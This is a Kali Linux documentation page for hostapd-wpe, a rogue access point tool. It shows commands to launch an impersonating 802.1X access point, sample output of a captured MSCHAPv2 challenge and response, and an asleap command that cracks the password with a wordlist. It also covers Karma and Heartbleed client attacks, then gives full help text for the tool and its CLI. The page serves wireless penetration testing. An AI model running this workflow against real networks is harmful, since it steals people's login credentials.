Tool Documentation:
hostapd-wpe Usage Example
Update your Kali installation, install hostapd-wpe if not already present:
root@kali:~# apt update
root@kali:~# apt install hostapd-wpe
Once installed, configure AP properties by editing /etc/hostapd-wpe/hostapd-wpe.conf
root@kali:~# nano /etc/hostapd-wpe/hostapd-wpe.conf
Kill network-manager using airmon-ng
root@kali:~# airmon-ng check kill
Start hostapd-wpe. A wireless AP will appear. Passwords of users connecting and authenticating to this network will be printed to the console.
root@kali:~# hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Configuration file: /etc/hostapd-wpe/hostapd-wpe.conf
Using interface wlan0 with hwaddr c4:e9:84:17:ff:c8 and ssid "hostapd-wpe"
wlan0: interface state UNINITIALIZED>ENABLED
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: authenticated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED ac:fd:ec:78:72:bd
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
mschapv2: Sat Nov 12 16:04:03 2016
username: me
challenge: 8e:0e:9d:0b:5a:3f:f5:23
response: 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67
jtr NETNTLM: me:$NETNTLM$8e0e9d0b5a3ff523$34f8424d16c72d69cc3810d4cf71f7833768d88ae986f267
wlan0: CTRL-EVENT-EAP-FAILURE ac:fd:ec:78:72:bd
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: disassociated
wlan0: STA ac:fd:ec:78:72:bd IEEE 802.11: deauthenticated due to local deauth request
nl80211: deinit ifname=wlan0 disabled_11b_rates=0
Once a challenge and responce are obtained, crack them using asleap, together with a password dictionary file.
root@kali:~# zcat /usr/share/wordlists/rockyou.txt.gz | asleap -C 8e:0e:9d:0b:5a:3f:f5:23 -R 34:f8:42:4d:16:c7:2d:69:cc:38:10:d4:cf:71:f7:83:37:68:d8:8a:e9:86:f2:67 -W -
asleap 2.2 - actively recover LEAP/PPTP passwords. <[email protected]>
Using STDIN for words.
hash bytes: 586c
NT hash: 8846f7eaee8fb117ad06bdd830b7586c
password: password
Packages and Binaries:
This package contains hostapd modified with hostapd-wpe.patch. It implements IEEE 802.1x Authenticator and Authentication Server impersonation attacks to obtain client credentials, establish connectivity to the client, and launch other attacks where applicable.
hostapd-wpe supports the following EAP types for impersonation: 1. EAP-FAST/MSCHAPv2 (Phase 0) 2. PEAP/MSCHAPv2 3. EAP-TTLS/MSCHAPv2 4. EAP-TTLS/MSCHAP 5. EAP-TTLS/CHAP 6. EAP-TTLS/PAP
Once impersonation is underway, hostapd-wpe will return an EAP-Success message so that the client believes they are connected to their legitimate authenticator.
For 802.11 clients, hostapd-wpe also implements Karma-style gratuitous probe responses. Inspiration for this was provided by JoMo-Kun’s patch for older versions of hostapd.
hostapd-wpe also implements CVE-2014-0160 (Heartbleed) attacks against vulnerable clients. Inspiration for this was provided by the Cupid PoC:
hostapd-wpe logs all data to stdout and hostapd-wpe.log
Installed size: 2.25 MB
How to install: sudo apt install hostapd-wpe
- libc6
- libnl-3-200
- libnl-genl-3-200
- libsqlite3-0
- libunsafessl1.0.2
- make-guile | make
- openssl
root@kali:~# hostapd-wpe --help
hostapd-wpe: invalid option -- '-'
hostapd-WPE v2.10
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2022, Jouni Malinen <[email protected]> and contributors
WPE (Wireless Pwnage Edition)
This version has been cleverly modified to target
wired and wireless users.
Twitter: @aircrackng
usage: hostapd-wpe [-hdBKtvrkc] [-P <PID file>] [-e <entropy file>] \
[-g <global ctrl_iface>] [-G <group>]\
[-i <comma-separated list of interface names>]\
<configuration file(s)>
-h show this usage
-d show more debug messages (-dd for even more)
-B run daemon in the background
-e entropy file
-g global control interface path
-G group for control interfaces
-P PID file
-K include key data in debug messages
-f log output to debug file instead of stdout
-T record to Linux tracing in addition to logging
(records all messages regardless of debug verbosity)
-i list of interface names to use
-s log output to syslog instead of stdout
-S start all the interfaces synchronously
-t include timestamps in some debug messages
-v show hostapd version
WPE options:
-r Return Success where possible
-c Cupid Mode (Heartbleed clients)
-k Karma Mode (Respond to all probes)
Note: credentials logging is always enabled
root@kali:~# hostapd-wpe_cli -h
hostapd_cli v2.10
Copyright (c) 2004-2022, Jouni Malinen <[email protected]> and contributors
usage: hostapd_cli [-p<path>] [-i<ifname>] [-hvBr] [-a<path>] \
[-P<pid file>] [-G<ping interval>] [command..]
-h help (show this usage text)
-v shown version information
-p<path> path to find control sockets (default: /var/run/hostapd-wpe)
-s<dir_path> dir path to open client sockets (default: /var/run/hostapd-wpe)
-a<file> run in daemon mode executing the action file based on events
from hostapd
-r try to reconnect when client socket is disconnected.
This is useful only when used with -a.
-B run a daemon in the background
-i<ifname> Interface to listen on (default: first interface found in the
socket path)
ping = pings hostapd
mib = get MIB variables (dot1x, dot11, radius)
relog = reload/truncate debug log output file
status = show interface status info
sta <addr> = get MIB variables for one station
all_sta = get MIB variables for all stations
list_sta = list all stations
new_sta <addr> = add a new station
deauthenticate <addr> = deauthenticate a station
disassociate <addr> = disassociate a station
signature <addr> = get taxonomy signature for a station
sa_query <addr> = send SA Query to a station
wps_pin <uuid> <pin> [timeout] [addr] = add WPS Enrollee PIN
wps_check_pin <PIN> = verify PIN checksum
wps_pbc = indicate button pushed to initiate PBC
wps_cancel = cancel the pending WPS operation
wps_nfc_tag_read <hexdump> = report read NFC tag with WPS data
wps_nfc_config_token <WPS/NDEF> = build NFC configuration token
wps_nfc_token <WPS/NDEF/enable/disable> = manager NFC password token
wps_ap_pin <cmd> [params..] = enable/disable AP PIN
wps_config <SSID> <auth> <encr> <key> = configure AP
wps_get_status = show current WPS status
disassoc_imminent = send Disassociation Imminent notification
ess_disassoc = send ESS Dissassociation Imminent notification
bss_tm_req = send BSS Transition Management Request
get_config = show current configuration
help = show this usage help
interface [ifname] = show interfaces/select interface
fst <params...> = send FST-MANAGER control interface command
raw <params..> = send unprocessed command
level <debug level> = change debug level
license = show full hostapd_cli license
quit = exit hostapd_cli
set <name> <value> = set runtime variables
get <name> = get runtime info
set_qos_map_set <arg,arg,...> = set QoS Map set element
send_qos_map_conf <addr> = send QoS Map Configure frame
chan_switch <cs_count> <freq> [sec_channel_offset=] [center_freq1=]
[center_freq2=] [bandwidth=] [blocktx] [ht|vht]
= initiate channel switch announcement
hs20_wnm_notif <addr> <url>
= send WNM-Notification Subscription Remediation Request
hs20_deauth_req <addr> <code (0/1)> <Re-auth-Delay(sec)> [url]
= send WNM-Notification imminent deauthentication indication
vendor <vendor id> <sub command id> [<hex formatted data>]
= send vendor driver command
enable = enable hostapd on current interface
reload = reload configuration for current interface
disable = disable hostapd on current interface
update_beacon = update Beacon frame contents
erp_flush = drop all ERP keys
log_level [level] = show/change log verbosity level
pmksa = show PMKSA cache entries
pmksa_flush = flush PMKSA cache
set_neighbor <addr> <ssid=> <nr=> [lci=] [civic=] [stat]
= add AP to neighbor database
show_neighbor = show neighbor database entries
remove_neighbor <addr> [ssid=<hex>] = remove AP from neighbor database
req_lci <addr> = send LCI request to a station
req_range = send FTM range request
driver_flags = show supported driver flags
dpp_qr_code report a scanned DPP URI from a QR Code
dpp_bootstrap_gen type=<qrcode> [chan=..] [mac=..] [info=..] [curve=..] [key=..] = generate DPP bootstrap information
dpp_bootstrap_remove *|<id> = remove DPP bootstrap information
dpp_bootstrap_get_uri <id> = get DPP bootstrap URI
dpp_bootstrap_info <id> = show DPP bootstrap information
dpp_bootstrap_set <id> [conf=..] [ssid=<SSID>] [ssid_charset=#] [psk=<PSK>] [pass=<passphrase>] [configurator=<id>] [conn_status=#] [akm_use_selector=<0|1>] [group_id=..] [expiry=#] [csrattrs=..] = set DPP configurator parameters
dpp_auth_init peer=<id> [own=<id>] = initiate DPP bootstrapping
dpp_listen <freq in MHz> = start DPP listen
dpp_stop_listen = stop DPP listen
dpp_configurator_add [curve=..] [key=..] = add DPP configurator
dpp_configurator_remove *|<id> = remove DPP configurator
dpp_configurator_get_key <id> = Get DPP configurator's private key
dpp_configurator_sign conf=<role> configurator=<id> = generate self DPP configuration
dpp_pkex_add add PKEX code
dpp_pkex_remove *|<id> = remove DPP pkex information
dpp_controller_start [tcp_port=<port>] [role=..] = start DPP controller
dpp_controller_stop = stop DPP controller
dpp_chirp own=<BI ID> iter=<count> = start DPP chirp
dpp_stop_chirp = stop DPP chirp
accept_acl =Add/Delete/Show/Clear accept MAC ACL
deny_acl =Add/Delete/Show/Clear deny MAC ACL
poll_sta <addr> = poll a STA to check connectivity with a QoS null frame
req_beacon <addr> [req_mode=] <measurement request hexdump> = send a Beacon report request to a station
reload_wpa_psk = reload wpa_psk_file only
Updated on: 2024-Mar-11